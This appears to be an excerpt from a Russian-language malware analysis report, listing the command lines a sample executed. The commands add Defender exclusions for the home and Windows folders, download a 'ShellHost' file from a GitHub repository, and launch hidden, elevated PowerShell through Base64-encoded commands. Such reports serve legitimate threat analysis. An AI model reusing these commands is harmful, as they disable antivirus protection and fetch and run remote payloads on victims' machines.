Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath %HOMEPATH% -Force; Add-MpPreference -ExclusionPath '%WINDIR%' -Force; Invoke-WebRequest -Uri 'https://github.com/Wefega-lab/my-game/raw/main/ShellHost....
- '<SYSTEM32>\cmd.exe' /c Powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAALQBBAHIAZwB1AG0AZQBuAH...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAg...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath %HOMEPATH% -Force; Add-MpPreference -ExclusionPath '%WINDIR%' -Force; Invoke-WebRequest -Uri 'https://github.com/Wefega-lab/my-game/raw/main/ShellHost.... (со скрытым окном)